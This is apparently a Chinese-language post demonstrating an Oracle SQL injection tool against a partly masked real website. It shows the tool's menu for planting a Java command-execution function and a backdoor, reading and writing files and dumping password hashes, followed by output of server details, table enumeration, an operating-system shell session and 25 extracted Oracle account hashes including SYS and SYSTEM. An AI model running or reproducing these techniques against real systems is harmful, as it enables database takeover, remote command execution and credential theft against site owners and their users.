三種不需要盲注的oracle注入工具

E:\tools>OraInj-error.pl “http://www.mic*.com/index.php?id=421″

==========================================================================

Oracle Injection with Display errors

v0.8 beta

1.擷取系統資訊

2.執行SQL語句

3.執行本地SQL腳本

4.植入linxruncmd()函數

5.擷取目前使用者表

6.擷取指定表的字段

7.擷取資料表内容

8.進入cmd模式(需要植入函數成功)

search.字段模式比對

pwd.枚舉使用者hash

read.調用utl_file讀檔案

write.調用utl_file寫檔案

down.Oracle植入下載下傳函數oradownload()

backdoor.植入函數SQLEXEC()

link.建立連結伺服器

q.退出到上級菜單

0.顯示幫助資訊

# 1

伺服器監聽IP：192.168.2.9

伺服器機器名：www.*soft.com

WEB 伺服器IP：192.168.2.8

WEB 機器名稱：www.*soft.com

客戶啟動賬号：apache

目前使用者名稱：NARU

權限是否 DBA：FALSE

目前資料庫名：GJDB

資料庫執行個體名：GJDB

資料庫安裝 ：/oradata/GJDB/redo03.log

資料庫版本号：TNS for Linux: Version 10.2.0.1.0 – Production

# 5

正在枚舉目前使用者表名

資料清單數目：11

正在擷取第1條記錄：SHOW_TEST

正在擷取第2條記錄：LEASE

正在擷取第3條記錄：SHOW

正在擷取第4條記錄：ZIPCODE

正在擷取第5條記錄：TBLPOLL

正在擷取第6條記錄：TBL_IMG

正在擷取第7條記錄：SMSMESSAGE

正在擷取第8條記錄：FLASH

正在擷取第9條記錄：TBLCOUNTER

正在擷取第10條記錄：SHOW1

正在擷取第11條記錄：LEASEJUN

# 4

建立java包

伺服器回應：Success.

賦予public執行java io權限

建立函數linxruncmd()

賦予public對linxruncmd的權限

# 8

OSCMD>/bin/ls

hc_GJDB.dat

init.ora

initGJDB.ora

initdw.ora

lkGJDB

orapwGJDB

spfileGJDB.ora

OSCMD>/bin/ls /

bin

boot

data

data1

dev

etc

home

initrd

lib

lib64

lost+found

media

misc

mnt

mycomputer

opt

oradata

proc

root

sbin

selinux

sqlnet.log

srv

sys

tftpboot

tmp

usr

var

OSCMD>q

# search

Keyword>password

正在搜尋字段名含有關鍵字password的表

這樣的表共有：0

# admin

Keyword>admin

正在搜尋字段名含有關鍵字admin的表

# pwd

表sys.user$ where type%23>0 and length(password)=16中的記錄數目：25

正在擷取第1條記錄：SYS|5638228DAF52805F

正在擷取第2條記錄：SYSTEM|D4DF7931AB130E37

正在擷取第3條記錄：OUTLN|4A3BA55E08595C81

正在擷取第4條記錄：DIP|CE4A36B8E06CA59C

正在擷取第5條記錄：DMSYS|BFBA5A553FD9E28A

正在擷取第6條記錄：TSMSYS|3DF26A8B17D0F29F

正在擷取第7條記錄：DBSNMP|E066D214D5421CCC

正在擷取第8條記錄：WMSYS|7C9BA362F8314299

正在擷取第9條記錄：EXFSYS|66F4EF5650C20355

正在擷取第10條記錄：CTXSYS|71E687F036AD56E5

正在擷取第11條記錄：XDB|88D8364765FCE6AF

正在擷取第12條記錄：OLAPSYS|3FB8EF9DB538647C

正在擷取第13條記錄：ORDSYS|7EFA02EC7EA6B86F

正在擷取第14條記錄：ORDPLUGINS|88A2B2C183431F00

正在擷取第15條記錄：SI_INFORMTN_SCHEMA|84B8CBCA4D477FA3

正在擷取第16條記錄：MDSYS|72979A94BAD2AF80

正在擷取第17條記錄：SYSMAN|447B729161192C24

正在擷取第18條記錄：MDDATA|DF02A496267DEE66

正在擷取第19條記錄：GJ_AUDIT|F908F53DF6507797

正在擷取第20條記錄：MGMT_VIEW|442167C25FAC883C

正在擷取第21條記錄：SCOTT|F894844C34402B67

正在擷取第22條記錄：FMC_USER|C2C1B67EC7F525AB

正在擷取第23條記錄：SMS|23C574F5509AEC3A

正在擷取第24條記錄：NARU|74A0C14CEC9C635A

正在擷取第25條記錄：SEOULCULTURE|99FEAAE16D228ED1

Keyword>pass

正在搜尋字段名含有關鍵字pass的表

這樣的表共有：8

正在擷取第1條記錄：BIN$RNczTeOGUHLgQKjACQJEHw==$0

正在擷取第2條記錄：BIN$gNG02WYik5XgQKjACQI7Sw==$0

正在擷取第3條記錄：BIN$gNG06OKzqVTgQKjACQI7Yg==$0

正在擷取第4條記錄：BIN$gNG1ICF1YgLgQKjACQI68g==$0

正在擷取第5條記錄：BIN$gNG1J5gq+33gQKjACQI69A==$0

正在擷取第6條記錄：BIN$gNG1L1hzfOvgQKjACQI7Ww==$0

正在擷取第7條記錄：BIN$gNG1OQnTjYbgQKjACQI7Zg==$0

正在擷取第8條記錄：BIN$gNG1QW9XqArgQKjACQI7Vw==$0